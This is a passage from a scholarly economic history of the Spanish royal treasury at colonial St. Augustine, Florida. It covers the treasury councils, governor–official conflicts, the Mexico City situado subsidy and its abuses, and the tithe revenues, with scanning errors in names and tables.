message. Any letter not in his script was considered a rough draft; his signature verified a legal copy. The public and governmental notary was paid a plaza plus salary, which began at 100 ducats a year but around 1631 was reduced to 400 reales. Since no money or supplies passed through his hands he did not furnish bond.32 Although in his public office a notary was supposed to be impartial and incorruptible, it was hard for him to oppose the governor who had appointed him, could remove him, and might fine him besides.33 Captain Hernando de Mestas, in a letter smuggled out of prison, said that the notary was his enemy and had refused him his office. "The former notary would not do what he was told," said Mestas, "so they took the office from him and gave it to the present one who does what they tell him, and he has a house and slaves, while I am poor."34 In an effort to get the notaryship out of the governor's power the royal officials suggested to the crown that the position be put up for public auction. The idea was quickly taken up, but the new system probably changed little. In a town both inbred and illiterate, notaries were not easy to find. When Alonso de Solana was suspended from that office by the king's command, and again when he died, the highest bid to replace him (and the one the royal 58 Duties and Organization officials accepted) was that of his son.35 For these reasons of autoc- racy, patronage, and inbreeding, little reliance can be placed upon local testimony about a controversial topic. As the bishop of Tricale, visiting St. Augustine in the eighteenth century, explained: "Here there is a great facility to swear to whatever is wanted."36 At their treasury council the royal officials checked the contents of the treasure chest against the book of the coffer. Whatever had been collected since the last time the chest was open was produced; they all signed the receipt and saw the money deposited in the coffer and entered into the book of the coffer kept inside it. It was not unheard of for an official to keep out part of the royal revenues, so that they never entered the record at all. As long as the chest was open, those vecinos using it as a safe might drop by to make a deposit or to check on the contents of their own small locked cases, for the treasure chest was the nearest thing to a bank vault in town. The treasury officials were not supposed to borrow the king's money or lend it to their friends, but from the number of deficits found by auditors, they must have done so regularly. When detected, they had to replace the money within three days or face suspension.37 The treasury was not the only source of credit. Soldiers pledged their wages to provide bond for an officeholder or situador. Shipowners sold their vessels to the presidio on time. To ration the garrison Governor Hita Salazar borrowed produce stored up for sale by the Franciscans.38 Even Indians operated on the deferred payment plan. The Christians of San Pedro sold cargoes of maize to the garrison on credit and so did the heathen on the far side of Apalache. The Guale women who peddled foodstuffs and tobacco required a pledge of clothing from Spanish soldiers, and it was complained that they returned the garments in bad condition.39 After the examination of the coffer the royal officials went on to important deliberations. Dispatches from the crown addressed to "my royal officials" were opened by all of them together. Their replies, limited to one subject per letter were signed collegially except when one official in disagreement with the others wrote on his own. The notary wrote up a resume of actions taken, which each official signed. If there had been disagreement each one signed after his own opinion (parecer), but the vote of the majority carried. The minutes of the meeting, in the book of resolutions (libro de acuerdos), had the force of a judicial action.40 59 The King's Coffer The governor was entitled to attend the treasury council and vote in it, but not to put a lock of his own on the coffer. The royal officials considered it a hazard to the treasury for the governor to hold a key to it, and the crown agreed. No one should have access to the king's money, plate, and jewels without corresponding responsibility for them. Governors in Florida were forbidden to put a lock on the royal coffer by a 1579 restraining order that was repeated after further complaints in 1591 and 1634.41 The governor's vote, although not decisive, had inordinate weight on the council, especially after the number of officials was reduced from three to two. The treasury officials were aware of what this meant. In 1646 they wrote: The governor who advised Your Majesty on this could have had no other motive than less opposition to his moneymak- ing, because three, Sire, are not as easy to trample on as just two; and besides, if one of them combines with the governor what can the other poor fellow do, in a place where a governor can do whatever he likes?42 The governor was most definite about this right when it was time to commission someone to collect the situado. Once a year the treasury council met. to decide on the year's situador and what he should bring back from Mexico City, Vera Cruz, and Havana. To- gether they wrote out his instructions, signed his powers of attorney, and accepted his 2,000-ducat bond. Since it was not feasible for the agent to contact them after he left, they must choose someone of independent judgment and wide experience-one of themselves, thought the royal officials. It did not deter them to remember that a proprietor on per diem drew higher wages than the governor. Mar- ques Cabrera, who was suspicious about most of what royal officials did, pointed out that the situador was supposed to answer to them and they could not fairly judge themselves. A governor usually proposed someone from his household. Nevertheless, of the twenty-one royally appointed officials from 1565 to 1702, seventeen are known to have been situador at least once, and many went several times.43 Another important commissioned agent was the procurador, or advocate, who represented the presidio on trips to Spain. As his primary duty was to bring back soldiers and military supplies, the procurador was usually either an officer with a patent from the crown 60 Duties and Organization or someone from the governor's house who had been appointed an officer ad interim. When he had time the procurador conducted business of his own, and for many this was their main object. The colony was allowed two ships-of-permission per year. Pelts worth 2,000 or (after Governor Salinas requested an increase) 3,000 ducats could be taken to Spain and cargoes brought back for resale, if anyone wanted to bother. Procurador Juan de Ayala y Escobar, whose career has been studied by Gillaspie, found the Spanish trade worth his while. His instinct for scenting profit in war and famine was some- thing the crown overlooked in return for his keeping St. Augustine supplied.44 At the weekly treasury council, bills were presented. The treasury officials examined the authorization for each purchase, along with the affidavit verifying the price as normal, the bill of lading, and the factor's or steward's receipt for goods delivered. If everything was in order the bill was entered into the book of libranzas (drafts), which was a sort of accounts payable. Each entry carried full details of date, vendor, items, quantity, price, and delivery, as well as the signed certifications of the royal officials and the governor Such entries had great juridical value. A libranza, which was acceptable legal tender was no more than the notarized copy of an entry. Sinchez-Bella maintains that the libranzas, or drafts on the royal treasury, were the primary cause of friction between governors and royal officials in the Indies.45 The governor of Florida had been ordered to make with- drawals in conjunction with the officials of the treasury, but many executives found this too restricting. When Governor Mendez de Canzo ordered payments against the officials' advice he did not want their objections recorded; Governor Treviiio Guillamas told them flatly that it was his business to distribute the situado, not theirs; Governor Horruytiner presented them with drafts made out for them to sign.46 The officials were not as helpless as they liked to sound. The governor endorsed the libranzas, but they had the keys to the coffer.47 Governors tried several methods of managing the royal officials. One was by appointment and control of their notary. Another was interference with the mails. Francisco de la Rocha and Salvador de Cigarroa complained that few of the cedulas they were supposed to index ever reached them. Another set of officials, going through the desk of Governor Martinez de Avendafio after his death, found many 61 The King's Coffer of their letters to the crown, unsent. Interim Governor Gutierre de Miranda stopped the passage of all mail, confiscating one packet smuggled aboard a dispatch boat in ajar of salt.48 Other governors operated by the threat of fines. IfArgiielles did not finish a report on the slaves and the castillo within six days-500 ducats; ifSinchez Saez did not remain on duty at the customs house-500 ducats; if Cuevas, Menendez Marquez, and Ramirez did not sign the libranza to pay the governor's nephew ahead of everyone else-500 ducats each, and 200 ducats from the notary.49 A truly intransigent official could be sus- pended or imprisoned in his house-a punishment that carried little onus. Governor Ybarra confined Sinchez Saez three times. Govern- ors Fernandez de Olivera and Torres y Ayala both arrived in St. Augustine to find the officials of the treasury all under arrest.50 While the governor could attend an ordinary treasury council and exercise a vote equal to a royal official's, he could also summon a general treasury council (acuerdo general de hacienda) with an agenda of his own. The crown insisted at length that there be no expense to the exchequer without prior approval, yet it was grudgingly conceded that in wartime, at a distance of 3,000 miles, emergencies could arise. At a general treasury council the governor authorized extraordinary expenditures personally and had the royal officials explain later. On the pretext that the counting house needed repairs, Governor Mar- ques Cabrera had all treasury councils meet at his house and, using the excuse of seasonal piracy and Indian raids, spent as he pleased.51 Their reports could be depended on to get such a headstrong executive into trouble, but the treasury officials did not wholly rely on the slow workings of royal justice. St. Augustine had its own ways to bedevil a governor and to make him write, as Marques Cabrera did to the king: "Next to my salvation there is nothing I long for more than to have the good fortune of leaving this place to wherever God may help me-anywhere, as long as I shall find myself across the bar of this harbor!"52 62 5 The Situado HE Florida coffer had two sources ofincome:;,Qcally- generated Royal taxes and revenues, which will be treated in the next chapter, and the situado, basically a transfer between treasuries. Although the connections between principal treasuries were tenuous and debts against one were not collectible at another; a more affluent treasury could have charged upon it the upkeep of defense outposts along its essential trade routes. The shifting fortunes of the West Indies can be traced in the various treasuries' obligations. At first the House of Trade and Santo Domingo did most of the defense spend- ing; then it was the ports of the circum-Caribbean. By the 1590s the viceregal capitals and presidencies had assumed the burden: Lima provided the situado for Chile; Cartagena, the subsidies of Santa Marta and Rio de la Hacha; Mexico City, those for the rest of the Caribbean.1 In Pedro Menendez's contract with the king (as rewritten fol- lowing news of a French settlement in Florida) the adelantado was promised certain trade concessions, the wages for 300 soldiers, and 15,000 ducats. This was the first stage of the Florida subsidy, lasting three years. When the contract was renewed, along with its trading privileges, only 150 men were provided for and their wages were to be taken from Menendez's new armada's subsidy, which was funded equally by the Tierra Firme and New Spain treasuries. In 1570 the Florida subsidy was separated from that of the Indies Fleet, though Florida support remained a charge on Tierra Firme, along with a new 63 The King's Coffer subsidy for Havana.2 When the Tierra Firme treasury was divided in 1573 into one at Nombre de Dios and one at Panama, Philip II moved responsibility for Florida's subsidy to the New Spain coffer of Vera Cruz, which had financed the luckless Tristan de Luna expedition to the Pensacola area in 1559. In 1592 the obligation was transferred to the royal treasury in Mexico City, where it remained for the rest of the Habsburg period.3 The situado was not a single subsidy but a cluster of them, mostly based on the number of authorized plazas in the garrison. The 23,436-ducat total that the officials of Tierra Firme were told to supply yearly beginning in 1571 consisted of 18,336 ducats to ration 150 men and 1,800 ducats to pay them (at the rate ofl ducat a month as in the fleet of Menendez), 1,800 ducats for powder and ammunition, and 1,500 ducats for "troop commodities."4 When Pedro Menendez Marquez went to Florida with reinforcements to restore a fort at Santa Elena, the crown doubled the size of the garrison but increased the subsidy by only four million maravedis, or 10,668 ducats. This was corrected in 1579 when the situado was raised to 47,770 ducats. Soon afterward, the crown accepted the new royal officials' plan for collecting the situado themselves, by turn, and administering the supplies.5 The total did not change substantially for the next ninety years. An inflationary rise in the cost of provisions was absorbed by the soldiers, whose plazas were converted to a flat 1,000 maravedis per month (115 ducats a year) to cover both rations and wages. In an effort to economize, and at the recommendation of Governor Men- dez de Canzo, the crown attempted to return the garrison size to 150 men; it succeeded only in making his successor; Governor Ybarra, unpopular.6 Active strength was diminished more gradually and effectively by increasing the number of "useless persons" (intitiles) holding the plazas of soldiers. Perhaps most of these were friars. In 1646 a ceiling was set of 43 Franciscans to be paid out of the subsidy and the additional ones became supernumerary, covered by a separate situado for friars which their lay treasurer; or syndic, was permitted to collect directly. Later in the seventeenth century the same threat from the north that stimulated the construction of Castillo de San Marcos brought an increase in the size of the garrison. Fifty plazas were added in 1669, and in 1673 the 43 friars became supernumerary along with their colleagues. This gave the presidio an authorized 64 strength of 350 soldiers, which in 1687 the crown increased to 355.7 The situado was not equivalently raised by 55 plazas of 115 ducats. Its yearly total in 1701 was only some 70,000 pesos, or about 51,000 ducats.8 Within that slowly rising total the nonplaza subsidies had varied considerably since 1571. New funds had been created, while old ones had been reduced in amount, changed in purpose, or elimi- nated. A governor appointed to Florida usually left Spain on a presidio frigate loaded with troops for the garrison and also with armor, gunpowder; and ammunition. The money for these essential military supplies was sometimes advanced by order of the crown from one of the funds at the House of Trade, the amount being deducted from the next situado by a coffer transfer. In wartime, a presidio-appointed procurador made extra trips to Spain for materiel. The funds for these large, irregularly spaced expenditures accumulated in a munitions reserve. The 1,500 ducats for "troop commodities" was a bonus (ventajas) fund used for increasing the base pay of officers and of soldiers on special assignment, such as working in the counting house or singing in the choir It doubled with the size of the garrison in the 1570s, but after the temporary reduction during the governorship of Ybarra the second 1,500 ducats was not restored. Periodically the crown asked for a list of bonus recipients, and any change was supposed to receive its approval.9 In time, bonuses were used like plazas, to reward or to pension petitioners. As was to be expected, the crown was more generous in allocation than in fulfillment, and recipients waited years for "first vacancies" and futuras of bonuses in Florida, as grantees waited elsewhere in the Indies for encomienda revenues.10 Toward the end of the seventeenth century the bonus fund was liquidated. As the holders of bonuses transferred or died, their portions were applied toward officers' salaries in the third infantry company, formed in 1687.11 In 1577 a new fund was added to the situado when Governor Menendez Marquez and the treasury officials were given permission to collect half their salaries out of it. The governor's half-salary was 1,000 ducats. When there were three proprietary officials in the treasury, each one getting 200,000 maravedis (533 ducats) in cash, the figure for administrative salaries came to 2,600 ducats a year. Menen- dez Marquez soon got permission to draw his entire salary from the The Situado 65 The King's Coffer situado-for a limited period, he was cautioned; but the privilege was extended to succeeding governors, raising the budget for salaries by 1,000 ducats. This was reduced by one royal official's half-salary when the position of factor-overseer was suppressed. Only when an auditor was residing in St. Augustine did the salaries fund rise above 3,067 ducats.12 In 1593 the crown authorized an unspecified fund for making gifts to Indians: thegasto de indios. Perhaps it was meant to take the place of the allowance for munitions, for Philip II was serious about his pacification policy. Those on the scene never achieved unanimity over whether to accomplish the conquest by kindness or by force. The friars once asserted that the cost of everything given to the natives up to their time, 1612, would not have bought the matchcord to make war on them. Anyway, since they moved about like deer, without property, there was no way to defeat them. Juan Men6ndez Marquez, an old Indian fighter had a contrary view. He observed that since the time of his cousin not one governor had extended a con- quest or made a discovery: all had gone about gratifying the Indians at the expense of His Majesty. This was not totally true, but it should not have been surprising. It must have been more pleasant to sail up the Inland Waterway, as Governor Ybarra did in 1604, distributing blankets, felt hats, mirrors, beads, and knives, than to burn houses and trample crops.13 In 1615 the Indian allowance was set at 1,500 ducats, but little effort was made to stay within it. Governor Rojas y Borja made 3,400 ducats' worth of gifts in a single year to the Indians, who called it tribute. Governor Salazar Vallecilla and the royal officials who substi- tuted for him distributed an average of 3,896 ducats' worth, and in one year 6,744.14 Unquestionably, part of this was used for trade, but when the Indian allowance was reduced or withheld, the chiefs attached to the Spanish by that means became surly. Eventually, the fund was used for purposes far from its original intention. Two hundred ducats and two rations of flour were assigned in 1698 from the "chiefs' fund" to the organist of the parish church and two altar boys respectively.15 The base figure of the situado was not necessarily the amount of money supplied. Superimposed upon it were the yearly variations. Occasionally funds were allocated for some special purpose: 26,000 pesos to rebuild the town after the 1702 siege of Colonel James 66 The Situado Moore; a full year's situado to replace the one stolen by Piet Heyn, and one lost in a shipwreck; 1,600 pesos to pay the Charles Town planters for runaway slaves the king wished to free.16 Additional money was sometimes sent for fortifications: commonly 10,000 ducats or pesos, delivered in installments.17 It was characteristic of these special grants that they were seldom used for the intended purpose. A greater emergency would intervene; the governor and royal officials would divert the fund to that, explain their reasons, and demand replacement.18 When it was possible the crown obliged. In the sixteenth century the officials of the supporting treasury were supposed to ask for a muster of the garrison and deduct the amount for vacant plazas from the situado. During the seventeenth century it was more common to use the surplus (sobras) from inactive plazas as a separate fund.19 In 1600, encouraged by the presence of a royal auditor; the officials volunteered that funds were accumulating in the treasury from the reserve for munitions, the freight on presidio vessels, and royal office vacancies. The surplus amounted to around 60,000 pesos by 1602-almost a whole year's situado. They sug- gested that as it was difficult to find the revenues locally to cover the unpaid half of their salaries, they could draw on these reserves.20 The king's financial advisors, greatly interested, told the officials of the Mexico City treasury to send the next Florida situado to Spain and to reduce future situados to reflect effective rather than authorized strength. From the Florida royal officials they asked an accounting of all unused monies to date. Much later; other officials received permis- sion to collect the rest of their salaries from reserves, but the reserves no longer existed.21 The crown had its own opinions on likely surpluses and what to do with them. The soldiers evacuated from Santa Elena in 1587 were reimbursed for their lost property by 1,391 ducats from the surpluses of the situado. In 1655, the year the English tookJamaica, the treasury officials were ordered to use the unpaid wages of deserters and the deceased to improve the presidio's defenses. Accountant Santos de las Heras objected that deserters forfeited their wages, the back wages of the deceased without heirs went to purchase masses for their souls, and, with situados three years behind, nobody was being paid any- way. The king's advisors replied that the accountant was to pay the living first and let the dead wait. Twenty years later a royal order arrived to use the unclaimed wages of deserters and deceased to 67 The King's Coffer provide plazas to crippled noncombatants.22 Not long afterward the royal officials were told to report on the funds from vacant plazas. It was the governor's prerogative to allocate the surplus, not theirs, the crown pointed out-a moot point, since a separate cedula of the same date instructed the governor to use the money on the castillo. At the end of the Habsburg period the viceroy of New Spain was instructed to send the surplus of the 1694 subsidy to Spain. It amounted to a third of the sum earmarked for plazas.23 There were many problems with the situado, part due to un- avoidable shortages and part to venality and graft. From the begin- ning there was a scarcity of currency. Both the Vera Cruz and the Mexico City officials were instructed to deliver the situado to its commissioned collectors in reales, since that was the coin in which to pay soldiers. Yet in spite of repeated injunctions to pay in coined reales (reales acuiados) the officials preferred to keep their specie at home. Instead they supplied silver in crudely shaped and stamped chunks calledplanchas or even in assayed ingots (plata ensayada) which the soldiers chopped into pieces. In 1601 Accountant Juan Menendez Marquez acting as situador could collect only 37 percent of the total in coin.24 Throughout the Habsburg period hard specie continued to be scarce in the provinces. In 1655 Auditor Santa Cruz estimated that in twenty years not 20,000 pesos in currency had entered the presidio. In place of money the creoles used such expediencies as yards of cloth or fractions of an ounce of amber.25 Wages were paid either in imported goods at high prices, in obsolete or inappropriate things the governor wanted to be rid of, or in libranzas or wage certificates that declined drastically in value and were bought up by speculators with inside knowledge.26 Although two resourceful Apalaches were caught passing homemade coins of tin, Indians ordinarily used no money, but bartered in beads, blankets, weapons, twists of tobacco, baskets, horses and other livestock, chickens, pelts and skins, and cloth. Great piles of belongings were gambled by the players and spectators at the native ball games. The Spanish governors begged for some kind of specie to be sent for small transactions and suggested 7,000 or 8,000 ducats in coins of silver and copper alloy (vellon) to circulate in the Florida provinces. Where there was no money, they explained, people were put to inconvenience.27 The quality of silver was another problem. In 1612 the Florida 68 officials sent over 1,000 reales' worth of miscellaneous pieces to the House of Trade for the receptor of the Council to buy them presidio weapons. The silver from Florida turned out to be of such low fineness that no one would accept it at more than 43 reales the mark. The crown demanded to be told the source of such degraded bullion and specie. In reply, the royal officials admitted that part of the consignment was in adulterated silver and clipped coins, but they had sent it as it had been received in fines, which the crown, in order to retire what was debased, allowed to be paid in any silver bearing the royal mark. They protested, however, that most of the offending silver had come from New Spain and could not be used in Florida, where the soldiers were supposed to be paid in reales. Certainly the base alloy had not been added to the silver while it was at their treasury.28 Over the seventeenth century the viceroy and royal officials of the Mexico City treasury allowed the situados to fall seriously behind. By 1642 the drafts against unpaid situados amounted to 250,000 pesos, four times the yearly subsidy. Four years later the situador was forced to ask for a cedula ordering the Mexico City officials to turn over the current situado to him instead of to Florida's creditors. In 1666 the situados were seven years behind, or some 461,000 pesos. In 1703 they were again 457,000 pesos in arrears.29 Although something was applied to these arrearages from time to time, the case seemed hopeless to the unpaid soldiers and to the local men and women who made their shoes and did their laundry. The crown set guidelines for paying back salaries in a fair manner, then circumvented its own instructions by giving out personal cedulas for some individuals to collect their wages ahead of the rest.30 The officials at St. Augustine treated payments toward back situados as a totally fresh and unex- pected revenue. They inquired in writing whether such money might not be used to build a stone fort or to found Spanish towns.31 The practice of letting some subsidies fall into arrears created new expenses to consume the other ones. Some of these expenses were for servicing the presidio's loans. A loan was taken out at the Mexico City treasury as early as 1595. Governor Salinas, in an effort to consolidate the treasury's debts, asked in 1621 for another loan of 30,000 or 40,000 pesos to be paid off in installments of 2,000 pesos from every situado. The crown was unhelpful about retiring this debt. A representative of the Council, making a grant of 150 ducats in The Situado 69 The King's Coffer 1627 to Florida's sergeant major observed that the money was to come from the situado surpluses as soon as there were any, "which will not be for many years because it is so far in debt now."32 In 1637 Governor Horruytiner inquired about yet another loan to pay the soldiers, who had had no wages in six or seven years. 33 The Francis- cans, dependent like the garrison on the situado, did their borrowing separately. In 1638 they were given permission to take out a travel loan from a fund at the House of Trade. Twenty years later they took out another, and in 1678 they were again forced to borrow, probably against their subsidy, paying 8 percent on a loan for 3,567 pesos.34 When the cost of credit was built into a bill of exchange to circumvent usury restrictions, the-price could be steep. The spice merchants (mercaderes en drogas) who exchanged the notes against unpaid situados discounted them 18 to 75 percent. Soldiers trying to spend their certificates for back wages were obliged to pay higher prices and accept inferior goods.35 Collection charges were nothing new. In 1580, when the subsidy came in care of the governor of Cuba, he kept out 530 ducats for himself, and the collectors charged an exorbitant 1,000 ducats. In the new system initiated by the proprietors who took office that year; one of them went for the situado, receiving an expense allowance of 1,000 maravedis (rounded to 30 reales) a day, double the per diem for a procurador or envoy to Spain. In the six or seven months that a situado trip was supposed to last, the per diem came to 500 or 600 ducats. The largest collection expense was probably for the bribes in the viceregal capital. Accountant-Situador Santos de las Heras said ruefully that to get anything accomplished there cost "a good pair of gloves. "36 Transportation costs varied according to whether the ships were chartered or presidio-owned. In 1577 it cost 2,000 ducats to bring a year's worth of supplies from New Spain in two hired frigates; the governor said that owning the ships would have saved three-fourths of it. Yet in 1600, Juan Menendez Marquez as situador had to charter three boats in San Juan de Ulua and a fourth in Havana.37 Auditor Santa Cruz, who wanted the Florida situado to pass through his hands, declared that the governor of Florida once had seven different situadores in Mexico City simultaneously, suing one another over who was to make which collections and receiving 30, 40, or 50 reales a day apiece while their boat and crew expenses 70 The Situado mounted in Vera Cruz. A single trip cost the treasury nearly 30,000 pesos, he said, out of a subsidy of 65,000. Ten years later the auditor added that the bribes at the Mexico City treasury came to 20,000 pesos, of which 18,000 went to the greater officials and 2,000 to the lesser Any situador could make a profit of 26,000 pesos, Santa Cruz insisted, by borrowing money to buy up Florida wage certificates and libranzas at a third to a half of their face value, then redeeming them at face value with situado funds. The rest of the money he could invest in clothing to be resold to the soldiers at high prices.38 Parish priest Leturiondo's accusations were vehement on a smaller and perhaps more accurate scale. The situador discounted 15 or 16 percent collection expenses from the priest's small stipend, he said, and took up to two years to deliver the items ordered.39 Partly because of the shortage of currency and the inadequate harbor-but also because Florida's east coast had little to export, once the sassafras boom ended-St. Augustine was not a regular port of call. This meant that whoever was chosen collector of the situado must double as garrison purchasing agent. Wine and flour produced in New Spain and sold in Havana cost over twice as much there, in 1577, as the same provisions in Spain. Governor Menendez Marquez found it necessary to exchange situado silver for gold at a loss and send it to Spain by a light, fast frigate, to buy meat and olive oil. In 1580 the presidio obtained permission to send two frigates a year to the mother country or the Canaries, but as prices and taxes rose there, flour and other foodstuffs had to be found increasingly in the col- onies.40 The rare accounts written by situadores en route describe the difficulties of collection, purchasing, and transportation from their point of view. After giving bond and receiving his instructions and power of attorney, the situador was issued a boat and crew. He left them in the harbor of San Juan de Ulia and journeyed up the road past Puebla de los Angeles to Mexico City. There he paid the appro- priate bribes and waited for his report on presidio strength to be checked, his supply ship's tonnage approved, and the situado deliv- ered. All of this took time. The situador executed private commis- sions, saw friends, and enjoyed a taste of big-city life. Perhaps he put a portion of the king's money out at interest or made other imaginative use of it. By the early seventeenth century, household items, coarse fabrics, and Indian trade goods were available at the workhouses of 71 The King's Coffer Mexico City and Puebla. In Vera Cruz there was flour of question- able quality. The paperwork for this large-scale shopping took more time, for local fiscal judges had to supply affidavits that Florida was not being charged an inflated price. Loading at San Juan de Ulhia proceeded relatively undisturbed by port authorities: presidio supplies were exempt by royal order from either sales tax or customs. With his ship loaded, the situador waited with his counterparts from other Caribbean presidios for a warship to escort them and carry their registered money as far as Havana.41 Floridians preferred to avoid this stop if they could, for creditors lay in wait at the Havana harbor and Cuban officials acting in the best interests of their island would attempt to attach part or all of the situado. The crown, which had interests of its own, might have sent them instructions to impound the situado for use in Spain. With creditors and crown outfoxed, the situador might still face a long wait until the coast guard reported the seaways clear of corsairs and the fleet was ready to sail northward through the Bahama Chan- nel. There is no telling how much of the Florida situado in both supplies and specie was lost en route.42 Buccaneers grew so bold in the late seventeenth century that they sometimes waited at anchor outside the St. Augustine harbor. To elude the enemy, Floridians crossed their bar at low tide; or they sailed in September and October under great danger of storms. The likelihood of disaster was com- pounded by defective ships. The Nuestra Seiora del Rosario capsized in the very harbor of San Juan de Ulia with 3,000 pesos' worth of supplies aboard. Another vessel, apparently being bought on time, was lost off Key Largo and the crown strongly advised that payment be stopped on it.43 A lost subsidy might be ordered replaced, but the sum could only be added to the arrears the Mexico City treasury already owed to the presidio. Safely unloaded in St. Augustine, the situador faced a personal obstacle: the rendering of his accounts. The royal officials checked his purchase invoices against goods delivered, comparing prices with affidavits; they examined his expense receipts and counted the money he turned over. The total ofinvoices, receipts, and cash must equal the amount of situado in his notarized papers of transmittal. For any shortage he was personally liable. The closing ofa situador's accounts might be delayed years waiting for all papers to arrive and be in order When the situador was expected, the officials went into action. 72 The Situado The public and governmental notary presented an up-to-date mus- ter; the master of construction turned in the number of days' labor owed to soldiers. From these and his own records the accountant certified the gross amount due each person on plaza. The factor or his steward (later, the treasurer-steward) supplied the total each soldier had drawn from the royal warehouse against his wages. The ac- countant deducted this figure, plus the compulsory contributions to service organizations and the notes presented by preferred creditors, to arrive at the net wages the treasurer should count out from the coffer Merchant Antonio de Herrera once brought the royal officials a list of 182 men in his debt for clothing and small loans. Although Governor Salinas authorized payment via payroll deduction Herrera was exiled shortly afterward. A few years later he reappeared by special, unexplained permission of the Council, and the soldiers were soon in debt to him again. Salinas, pleading their poverty, paid him with surplus situado funds. Governor-elect Rojas y Borja, of a more accommodating temperament, before he ever left Spain advanced Herrera directly from ensign to sergeant major of the garrison-an unlikely promotion for which the loan shark must have paid hand- somely.44 Any time a situador brought actual cash, St. Augustine became a busy place. Tables were set up in front of the guardhouse, and as the roll was called each man came by, picked up his wages, and took them to the next table under the eyes of his officers to pay his debts to local merchants, artisans, and farmers, whose order in line reflected their current favor with the administration.45 For the next few nights, while the soldiers had money in their purses, there was exuberant gambling in the guardhouse.46 The influx of currency threw the town into a short-lived flurry of economic activity during which St. Augustine resembled Jalapa during the fair, or opening day at the silver smeltery. Everyone on the payroll was supposed to get food and clothing at cost, but the original price became encrusted with surcharges.47 From time to time the crown ordered that the soldiers not be charged import or export duties, nor the cost of supplies for the situador's vessel, nor the cost of ship repairs and replacements.48 They were not to absorb the expense of supplies spoiled or mislaid, nor the 15 or 16 percent for handling, which may or may not have included the two reales per mark (nearly 8 percent) charge for changing silver.49 73 The King's Coffer Neither were they to have passed on to them the cost of loss and leakage, given in the form of percentages called mermas to the ship- master the steward, and presumably anyone else who transported or stored crown merchandise. According to Pilot Andres Gonzalez, the Council of the Indies allowed mermas of 3 percent on flour 4 percent on biscuit, 4 percent on salt, and 10 percent on maize. Given the density of rat population on the ships of the time, such allowances to a shipmaster may not have been excessive. Vazquez de Espinosa esti- mated that more than 4,000 rats were killed aboard his ship during a transatlantic crossing in 1622, not counting those the sailors and passengers ate.50 If there was any substance behind the prohibitions against add-on charges-and there is no reason to think otherwise-then prices "at cost" were costly indeed. Ex-Governor Hita Salazar; who had been governor of Vera Cruz before coming to Florida and who remained in St. Augustine as a private citizen after his term, once gave his experienced view of the situado. In spite of all the funds it contained-and he listed them: the 350 plazas for soldiers, the subsidy for friars, the allotment for administrative salaries, the 1,500-ducat Indian allowance, and the 1,500 ducats for bonuses-the common soldier still paid twice what he should have for shoddy goods he did not want, bought by profiteers with his own money.51 If private merchants could obtain no foothold in town, and no one could leave who was in debt to the exchequer then it is no wonder that by the 1680s garrison strength in Florida was being filled with sentenced malefactors and persons regarded as racial inferiors.52 The entire garrison below officer level was existing under the most inexorable debt peonage. 74 6 The Royal Revenues HE royal revenues that treasury officials in the Indies gathered C were varied. The Mexico City coffer; from which Florida received the situado, provides a good example. In 1598 its major accounts receivable were, in order of descending value: tribute, taxes on bullion, the monopoly of mercury, import and export taxes, sales tax, the tax of the crusade, the monopoly of playing cards, and the sale of offices. Grouped by category, the revenues of mines supplied the largest share of that treasury's yearly income, tribute came next, and commerce third. The impecunious crown soon exploited further sources of revenue: the clearing of land titles, the legitimizing of foreigner and mixed blood status, and voluntary contributions.1 On an infant colony such taxes were imposed lightly if at all, yet after a reasonable length of time a normal treasury was expected to begin producing revenue.2 This did not happen in Florida, where all the royal revenues put together were not enough for regular for- warding to the king. Still, the funds generated were sufficient to cover a number of ecclesiastical and provincial expenses, to aid in provisioning the garrison, and to occupy the royal officials' time. The crown's incomes fell into five categories: J 1. Ecclesiastical: tithes and indulgences. 2. Crown properties: lands, productive enterprises, slaves and convicts, royal offices and monopolies. 3. Shipping: freight charges and customs duties. 4. Barter salvage, and booty: the king's treasure taxes. 5. Personal levies: tribute and donations. 75 The King's Coffer In the Indies the tithes (diezmos) were meticulously divided. One-quarter of the revenue went to the bishop, one-quarter to the cathedral chapter Of the remainder; two-ninths went to the crown, four-ninths to local clerics, and three-ninths to the construction of churches and hospitals. Therefore, although the tithes were collected and administered by the treasury officials, they were of little or no profit to the crown.3 In theory, Indians had been legally exempt from tithing since 1533, but in practice this varied. Florida missionaries argued that even a native owed his tithes and firstfruits-to them, not to the crown or the bishop.4 We will return to the subject of Franciscan exactions under the heading of tributes. The legitimate tithes administered by the royal officials in St. Augustine came from Spanish Christians. To encourage production, new settlements of Spaniards in the Indies were usually free from tithing for the first ten years. While the adelantado's contract did not specify this, it probably held true for Florida.5 The tithes first gathered were so minimal that they enjoyed a certain independence-by-neglect. At the end of the sixteenth cen- tury the royal officials mentioned that they were collecting them in kind, auctioning the produce like any other royal property and using the proceeds to pay their own salaries. As can be seen in Table 4, the tithes of 1600 amounted to 840 pesos, three-fourths of which came from sales of maize, and the remainder from miscellany (menudos), probably other preservable produce. If the tithes of this period were collected at the rate of 212 percent, as they were later in the century, this suggests a titheable production worth over 33,000 pesos. Treas- urer Juan Menendez Marquez noted in 1602 that the tithes of 1600 had been auctioned immediately after harvest; the tithes of 1601 (which he did not disclose) only appeared to be higher because he and the other officials had stored the maize until its price had risen by half, then had the presidio buy it to ration slaves and soldiers.6 Around this time the crown ordered that the tithes go for four years toward construction of a parish church, a disposition that was gradually extended to twenty years. After that, church construction and maintenance were subsidized by 2,000 ducats from the vacancies of New Spain bishoprics, and the Florida officials were permitted to f use 516 ducats of the local tithes to pay secular clergy salaries, letting the remainder accumulate. Whenever the fund reached 4,000 or 5,000 reales the crown sent instructions on how to spend it. In the early 76 TABLE 4 VALUE OF TITHES AND TITHEABLE PRODUCTION (IN PESOS) Arrobas Tithes Misc. Tithes Year of from Tithes from Total Titheable Maize Maize (Menudos) Livestock Tithes Production 1600 -651 189 -840 33,600 1631 [569 166 -735 29,400 1632 2,691/2 569 135 -704 28,160 1633 569 167 -736 29,440 1648 847 847 70 220 1,137 45,480 1649 881 881 146 227 1,254 50,160 1650 1,468 1,468 120 265 1,853 74,120 1651 1,469 1,469 304 250 2,023 80,920 1652 1,391 1,391 116 152 1,659 66,360 1653 1,012 1,012 130 135 1,277 51,080 1654 1,024 1,024 142 176 1,342 53,680 1655 802 802 100 224 1,126 45,040 1656 743 743 150 193 1,086 43,440 1657 1,0431/2 1,043'/2 141 171 1,355 2 54,220 NOTE: Of the 2,691 '2 arrobas of maize from 1631 to 1633, 40612 were sold at 5 2 reales and 2,285 at 5 reales. The total of 1,707/2 pesos has been averaged on a yearly basis and rounded off to 569 pesos. From 1648 to 1657 the tithes of maize were bought at 1 peso the arroba. The King's Coffer 1620s and again in 1635 the bishop of Cuba inquired about his fourth of the Florida tithes. The 